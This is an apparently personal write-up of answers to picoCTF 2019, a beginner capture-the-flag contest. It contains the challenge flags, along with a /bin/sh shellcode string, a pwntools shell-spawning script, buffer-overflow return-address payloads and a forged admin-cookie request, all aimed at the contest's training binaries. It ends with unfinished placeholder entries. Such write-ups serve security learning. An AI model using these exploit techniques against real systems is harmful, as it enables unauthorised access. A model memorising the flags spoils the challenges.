Pico CTF 2019
In this article, I will share my answers for picoCTF 2019.
0) The Factory’s Secret – Points: 1
There appear to be some mysterious glyphs hidden inside this abandoned factory… I wonder what would happen if you collected them all?
-> I skip these task’s answer. I think able to solve this question. you must solve all question. Therefore, I skip this task.
1) Glory of the Garden – Points: 50 – Forensics
This garden contains more than it seems. You can also find the file in /problems/glory-of-the-garden_0_25ece79ae00914856938a4b19d0e31af on the shell server.
-> I download the file from given link. I try to open image but It doesn’t open. The I use strings command with grep command and I found the flag
1 |
strings garden.jpg | grep pico |
Here is a flag “picoCTF{more_than_m33ts_the_3y3f089EdF0}”
Answer: picoCTF{more_than_m33ts_the_3y3f089EdF0}
2) Insp3ct0r – Points: 50 – Web Exploitation
Kishor Balan tipped us off that the following code may need inspection: https://2019shell1.picoctf.com/problem/9509/
(link) or http://2019shell1.picoctf.com:9509
-> I open the website I open source code of this page. Than I found 1/3 flags. And above of html file I also found two different file which are mycss.css and myjs.js files. And remaing parts of flag are in these files.
1 2 3 4 5 |
<!-- Html is neat. Anyways have 1/3 of the flag: picoCTF{tru3_d3 --> /* You need CSS to make pretty pages. Here's part 2/3 of the flag: t3ct1ve_0r_ju5t */ /* Javascript sure is neat. Anyways part 3/3 of the flag: _lucky?9df7e69a} *// |
after ?part can chage for each user be careful
Answer: picoCTF{tru3_d3t3ct1ve_0r_ju5t_lucky?9df7e69a}
3) Lets Warm Up – Points: 50 – General Skills
If I told you a word started with 0x70 in hexadecimal, what would it start with in ASCII?
-> We can easily hex to ascii with using python.
1 |
"0x70"[2:].decode("hex") |
output is ‘p’
Answer: picoCTF{p}
4) The Numbers – Points: 50 – Cryptography
The numbers… what do they mean?
-> Link has an image. Image is shown at bellow. As you can see {} are have our flag. Also, we can say that 16 9 3 15 3 20 6 is picoCTF. c C is also 3. So that, order and uppercase don’t have an effect. You can use the second image to encrypt this picture.
Answer: PICOCTF{THENUMBERSMASON}
5) Warmed Up – Points: 50 – Cryptography
What is 0x3D (base 16) in decimal (base 10)
-> Convert hex to integer. you can use int(“0x3D”,16)
Answer: picoCTF{61}
6) 2Warm – Points: 50 – General Skills
Can you convert the number 42(base 10) to binary (base 2)
-> You must convert an integer to binary you can use bin() function in python. In this case it will be bin(42)
Answer: picoCTF{101010}
7) handy-shellcode – Points: 50 – Binary Exploitation
This program executes any shellcode that you give it. Can you spawn a shell and use that to read the flag.txt? You can find the program in /problems/handy-shellcode_1_ebc60746fee43ae25c405fc75a234ef5 on the shell server. Source.
-> Note: I am using SSH for connect to shell server. You can also use the shell page in website.
in that directory. these are the files. As you can see flag.txt is there but we don’t permission to access that. But vuln file can access that because these files are in same group. Also we have permision for the execute that file.
First, we must look at the vuln.c file.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #define BUFSIZE 148 #define FLAGSIZE 128 void vuln(char *buf){ gets(buf); puts(buf); } int main(int argc, char **argv){ setvbuf(stdout, NULL, _IONBF, 0); // Set the gid to the effective gid // this prevents /bin/sh from dropping the privileges gid_t gid = getegid(); setresgid(gid, gid, gid); char buf[BUFSIZE]; puts("Enter your shellcode:"); vuln(buf); puts("Thanks! Executing now..."); ((void (*)())buf)(); puts("Finishing Executing Shellcode. Exiting now..."); return 0; } |
we have a getegid() function. So it will return the effective group ID of the calling process. After that, we will set the reail user id with using setresgid() function. Also we have a gets function we can use that function for buffer overflowing attack.
file ./vuln returns;
vuln: setgid ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=7b65fbf1fba331b6b09a6812a338dbb1118e68e9, not stripped
sp we need a elf-32 bit intel 80386 shellcode. I found one. Also you can find on Google.
I use echo -e “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80” > ~/s.txt for save the shell code. Than I will pipe shell code in binary. with using cat ~/s.txt – | ./vuln
Another solution; we can use python for the automate exploit. First you must donwload pwntools package for python. you can use pip install pwntools. Actually, we can use shell server. There are alredy have python and pwmtools package.
This is our exploit.py
1 2 3 4 5 |
import pwn sh = process('vuln') sh.sendlineafter(':\n', asm(shellcraft.i386.linux.sh())) sh.interactive() |
Answer: picoCTF{h4ndY_d4ndY_sh311c0d3_2cb0ff39}
8) pratice-run-1 – Points: 50 – Binary Exploitation
You’re going to need to know how to run programs if you’re going to get out of here. Navigate to /problems/practice-run-1_0_62b61488e896645ebff9b6c97d0e775e on the shell server and run this program to receive a flag.
-> use shell and just run ./run_this executable file. It will print the flag.
Answer: picoCTF{g3t_r3adY_2_r3v3r53}
9) unzip – Points: 50 – Forensics
Can you unzip this file and get the flag?
-> Just unzip the file with using unzip command it have image file and picture shows the flag.
Answer: picoCTF{unz1pp1ng_1s_3a5y}
10) vault-door-training – Points: 50 – Reverse Engineering
Your mission is to enter Dr. Evil’s laboratory and retrieve the blueprints for his Doomsday Project. The laboratory is protected by a series of locked vault doors. Each door is controlled by a computer and requires a password to open. Unfortunately, our undercover agents have not been able to obtain the secret passwords for the vault doors, but one of our junior agents obtained the source code for each vault’s computer! You will need to read the source code for each level to figure out what the password is for that vault door. As a warmup, we have created a replica vault in our training facility. The source code for the training vault is here: VaultDoorTraining.java
->When you download java code you will see the flag.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
import java.util.*; class VaultDoorTraining { public static void main(String args[]) { VaultDoorTraining vaultDoor = new VaultDoorTraining(); Scanner scanner = new Scanner(System.in); System.out.print("Enter vault password: "); String userInput = scanner.next(); String input = userInput.substring("picoCTF{".length(),userInput.length()-1); if (vaultDoor.checkPassword(input)) { System.out.println("Access granted."); } else { System.out.println("Access denied!"); } } // The password is below. Is it safe to put the password in the source code? // What if somebody stole our source code? Then they would know what our // password is. Hmm... I will think of some ways to improve the security // on the other doors. // // -Minion #9567 public boolean checkPassword(String password) { return password.equals("w4rm1ng_Up_w1tH_jAv4_fcb79c48f5b"); } } |
Note that, fcb79c48f5b part can be changed for each user
Answer: picoCTF{w4rm1ng_Up_w1tH_jAv4_fcb79c48f5b}
11) 13 – Points: 100 – Cryptography
Cryptography can be easy, do you know what ROT13 is? cvpbPGS{abg_gbb_onq_bs_n_ceboyrz}
-> ROT13 cryptography algorithm is one of the oldest methods. It shifts letters by 13. In this case.
Answer: picoCTF{not_too_bad_of_a_problem}
12) Bases – Points: 100 – General Skills
What does this bDNhcm5fdGgzX3IwcDM1
mean? I think it has something to do with bases.
-> Header of question shows gives a clue about the algorithm it is base64 chipher text. You can decode this chipher text using online decoder.
plain_text is : l3arn_th3_r0p35
Answer: picoCTF{l3arn_th3_r0p35}
13) Easy1 – Points: 100 – Cryptography
The one time pad can be cryptographically secure, but not when you know the key. Can you solve this? We’ve given you the encrypted flag, key, and a table to help UFJKXQZQUNB
with the key of SOLVECRYPTO
. Can you use this table to solve it?.
-> I downloaded the table. You can see at bellow. Actually, it looks like Vigenere cipher. For decryption, We must find SOLVECRYPTO
at rows or columns then we must find cipher messages letters in table. For S to U is C. For O to F is R. If you want you can use online decoder.
Answer : picoCTF{CRYPTOISFUN}
14) First Grep – Points: 100 – General Skills
an you find the flag in file? This would be really tedious to look through manually, something tells me there is a better way. You can also find the file in /problems/first-grep_2_04dbf496b78e6c37c0097cdfef734d88 on the shell server.
-> Probably, we need to use grep command with this file. I couldn’t execute this file. I don’t have permission to that. I use strings command with grep.
“strings file | grep pico”
Answer : picoCTF{grep_is_good_to_find_things_bf6aec61}
15) OverFlow 0 – Points: 100 – Binary Exploitation
This should be easy. Overflow the correct buffer in this program and get a flag. Its also found in /problems/overflow-0_5_db665826dabb99c44758c97abfd8c4c6 on the shell server. Source.
-> In this directory have 3 file. flag.txt, vuln, vuln.c. We don’t have a permision the open flag.txt file. but vuln executable have permision the access that group. Attirbutes are same as handy-shellcode(#6) task.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <signal.h> #define FLAGSIZE_MAX 64 char flag[FLAGSIZE_MAX]; void sigsegv_handler(int sig) { fprintf(stderr, "%s\n", flag); fflush(stderr); exit(1); } void vuln(char *input){ char buf[128]; strcpy(buf, input); } int main(int argc, char **argv){ FILE *f = fopen("flag.txt","r"); if (f == NULL) { printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n"); exit(0); } fgets(flag,FLAGSIZE_MAX,f); signal(SIGSEGV, sigsegv_handler); gid_t gid = getegid(); setresgid(gid, gid, gid); if (argc > 1) { vuln(argv[1]); printf("You entered: %s", argv[1]); } else printf("Please enter an argument next time\n"); return 0; } |
In this code we have a sigsegv_handler() function and that function binded with SIGSEGV signal. Also we have a fprintf methods which is printing our flag. So that we must to force to program to gives a segmentation fault. for the fget if we put more than FLAGSIZE_MAX It will be crash. In this case 128. when you put 133(5 char for overflow to return address) character, this is A for my case, program will go to segsegv signal.
1 |
./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
Answer : picoCTF{3asY_P3a5y4a888b8e}
16) Resources – Points: 100 – General Skills
We put together a bunch of resources to help you out on our website! If you go over there, you might even find a flag! https://picoctf.com/resources
(link)
-> Go to link. You will see flag below of that page
Answer : picoCTF{r3source_pag3_f1ag}
17) caesar – Points: 100 – Cryptography
Decrypt this message. You can find the ciphertext in /problems/caesar_1_4c9d445f770c71bd84ab0d822197a005 on the shell server.
-> picoCTF{zolppfkdqeboryfzlktjxksyyl} this is the cipher message. Ceaser-cipher methods use the shift methods. In this case when you shift letter by 3 you will see the message
Answer : picoCTF{crossingtherubiconwmanvbbo}
18) dont-use-client-side – Points: 100 –
Web Exploitation
Can you break into this super secure portal? https://2019shell1.picoctf.com/problem/49886/
(link) or http://2019shell1.picoctf.com:49886
-> Check HTML source of this link. You will see the recursive if statements.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
<script type="text/javascript"> function verify() { checkpass = document.getElementById("pass").value; split = 4; if (checkpass.substring(0, split) == 'pico') { if (checkpass.substring(split*6, split*7) == 'e2f2') { if (checkpass.substring(split, split*2) == 'CTF{') { if (checkpass.substring(split*4, split*5) == 'ts_p') { if (checkpass.substring(split*3, split*4) == 'lien') { if (checkpass.substring(split*5, split*6) == 'lz_e') { if (checkpass.substring(split*2, split*3) == 'no_c') { if (checkpass.substring(split*7, split*8) == '4}') { alert("Password Verified") } } } } } } } } else { alert("Incorrect password"); } } </script> |
We can write flag with using this split order.
Answer : picoCTF{no_clients_plz_ee2f24}
19) logon – Points: 100 – Web Exploitation
The factory is hiding things from all of its users. Can you login as logon and find what they’ve been looking at? https://2019shell1.picoctf.com/problem/45163/
(link) or http://2019shell1.picoctf.com:45163
-> When you look at the cookies you will see the admin cookie. When you set True. You will see the flag when you refresh page.
We can also solve this question with using python.
1 2 3 4 5 6 7 8 |
import requests import re c = {'admin': 'True'} r = requests.get('http://2018shell1.picoctf.com:37861/flag', cookies=c) source = r.text print re.findall(r'(picoCTF\{.+\})', source)[0] |
Answer : picoCTF{th3_c0nsp1r4cy_l1v3s_6679fcb5}
20) strings it – Points: 100 – General Skills
Can you find the flag in file without running it? You can also find the file in /problems/strings-it_2_865eec66d190ef75386fb14e15972126 on the shell server.
->We can use strings for find the flag without run the file.
./strings | grep pico
Answer : picoCTF{5tRIng5_1T_d5b86184}
21) vault-door-1 – Points: 100 – Reverse Engineering
This vault uses some complicated arrays! I hope you can make sense of it, special agent. The source code for this vault is here: VaultDoor1.java
-> In VaulltDoor1.java file have flag. We must to allign the letter with correct index.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 |
import java.util.*; class VaultDoor1 { public static void main(String args[]) { VaultDoor1 vaultDoor = new VaultDoor1(); Scanner scanner = new Scanner(System.in); System.out.print("Enter vault password: "); String userInput = scanner.next(); String input = userInput.substring("picoCTF{".length(),userInput.length()-1); if (vaultDoor.checkPassword(input)) { System.out.println("Access granted."); } else { System.out.println("Access denied!"); } } // I came up with a more secure way to check the password without putting // the password itself in the source code. I think this is going to be // UNHACKABLE!! I hope Dr. Evil agrees... // // -Minion #8728 public boolean checkPassword(String password) { return password.length() == 32 && password.charAt(0) == 'd' && password.charAt(29) == '3' && password.charAt(4) == 'r' && password.charAt(2) == '5' && password.charAt(23) == 'r' && password.charAt(3) == 'c' && password.charAt(17) == '4' && password.charAt(1) == '3' && password.charAt(7) == 'b' && password.charAt(10) == '_' && password.charAt(5) == '4' && password.charAt(9) == '3' && password.charAt(11) == 't' && password.charAt(15) == 'c' && password.charAt(8) == 'l' && password.charAt(12) == 'H' && password.charAt(20) == 'c' && password.charAt(14) == '_' && password.charAt(6) == 'm' && password.charAt(24) == '5' && password.charAt(18) == 'r' && password.charAt(13) == '3' && password.charAt(19) == '4' && password.charAt(21) == 'T' && password.charAt(16) == 'H' && password.charAt(27) == 'd' && password.charAt(30) == '8' && password.charAt(25) == '_' && password.charAt(22) == '3' && password.charAt(28) == '0' && password.charAt(26) == '9' && password.charAt(31) == 'f'; } } |
password.charAt(0) == ‘d’
password.charAt(1) == ‘3’
password.charAt(2) == ‘5’
password.charAt(3) == ‘c’
password.charAt(4) == ‘r’
password.charAt(5) == ‘4’
password.charAt(6) == ‘m’
password.charAt(7) == ‘b’
password.charAt(8) == ‘l’
password.charAt(9) == ‘3’
password.charAt(10) == ‘_’
password.charAt(11) == ‘t’
password.charAt(12) == ‘H’
password.charAt(13) == ‘3’
password.charAt(14) == ‘_’
password.charAt(15) == ‘c’
password.charAt(16) == ‘H’
password.charAt(17) == ‘4’
password.charAt(18) == ‘r’
password.charAt(19) == ‘4’
password.charAt(20) == ‘c’
password.charAt(21) == ‘T’
password.charAt(22) == ‘3’
password.charAt(23) == ‘r’
password.charAt(24) == ‘5’
password.charAt(25) == ‘_’
password.charAt(26) == ‘9’
password.charAt(27) == ‘d’
password.charAt(28) == ‘0’
password.charAt(29) == ‘3’
password.charAt(30) == ‘8’
password.charAt(31) == ‘f’
Answer : picoCTF{d35cr4mbl3_tH3_cH4r4cT3r5_9d038f}
22) what’s a net cat – Points: 100 – General Skills
Using netcat (nc) is going to be pretty important. Can you connect to 2019shell1.picoctf.com
at port 32225
to get the flag?
->use net-cat for connect to adress
nc 2019shell1.picoctf.com 32225
Answer : picoCTF{nEtCat_Mast3ry_b1d25ece}
23) where are the robots – Points: 100 – Web Exploitation
Can you find the robots? https://2019shell1.picoctf.com/problem/12267/
(link) or http://2019shell1.picoctf.com:12267
-> When we look at the title of the task, it try to give hint about robots.txt. Robots.txt is store the name of pages which is not allowed for robots. So that, we must check /robots.txt file.
1 2 |
User-agent: * Disallow: /713d3.html |
In this file /713d3.html page is not allowed for robots. So we can check that page manually. In that page you will see the plag
Answer : picoCTF{ca1cu1at1ng_Mach1n3s_713d3}
24) OverFlow 1 – Points: 150 – Binary Exploitation
You beat the first overflow challenge. Now overflow the buffer and change the return address to the flag function in this program? You can find it in /problems/overflow-1_6_0a7153ff536ac8779749bc2dfa4735de on the shell server. Source.
->These files have also same attributes with the previous OverFlow task.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include "asm.h" #define BUFFSIZE 64 #define FLAGSIZE 64 void flag() { char buf[FLAGSIZE]; FILE *f = fopen("flag.txt","r"); if (f == NULL) { printf("Flag File is Missing. please contact an Admin if you are running this on the shell server.\n"); exit(0); } fgets(buf,FLAGSIZE,f); printf(buf); } void vuln(){ char buf[BUFFSIZE]; gets(buf); printf("Woah, were jumping to 0x%x !\n", get_return_address()); } int main(int argc, char **argv){ setvbuf(stdout, NULL, _IONBF, 0); gid_t gid = getegid(); setresgid(gid, gid, gid); puts("Give me a string and lets see what happens: "); vuln(); return 0; } |
We must force to program go to flag function(). For this, we must overflow this program. Also we need to know flag function address. We can use objdump -d ./vuln | grep flag command for that/ Output us 080485e6 we must convert big endian. e6850408. And also we need overflow of array which is size is 64 but it is not work. Still we must increase number of A. After try to increase one by one. Finaly I found best size which is 76. So that we can use cat <(echo -e ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xe6\x85\x04\x08’) – | ./vuln
Answer : picoCTF{n0w_w3r3_ChaNg1ng_r3tURn5b80c9cbf}
25) So Meta – Points: 150 – Forensics
Find the flag in this picture. You can also find the file in /problems/so-meta_2_da856426d694a4f0637bf1b169d8524e.
-> Use strings for flag
strings pico_img.png | grep pico
Also you can use exiftool pico_img.png. In the artist label you will see the flag.
Answer : picoCTF{s0_m3ta_3d6ced35}
26) What Lies Within – Points: 150 – Forensics
Theres something in the building. Can you retrieve the flag?
->I just know one image encryption method which is steganography. I will try that. I will use online least significant bit steganography decoder. Yes, flag is there picoCTF{h1d1ng_1n_th3_b1t5}
Answer : picoCTF{h1d1ng_1n_th3_b1t5}
27) extensions – Points: 150 – Forensics
This is a really weird text file TXT? Can you find the flag?
-> I download that file. Than I check file with file command. It says this is a PNG image. Than I change the extension of txt to png. I found the flag.
Answer : picoCTF{now_you_know_about_extensions}
28) shark on wire 1 – Points: 150 – Forensics
We found this packet capture. Recover the flag. You can also find the file in /problems/shark-on-wire-1_0_13d709ec13952807e477ba1b5404e620.
->Probabaly, we must use WireShark for this task.
Answer : picoCTF{}
2#) ## – Points: ** – XX
—
->
Answer : picoCTF{}
2#) ## – Points: ** – XX
—
->
Answer : picoCTF{}
3#) ## – Points: ** – XX
—
->
Answer : picoCTF{}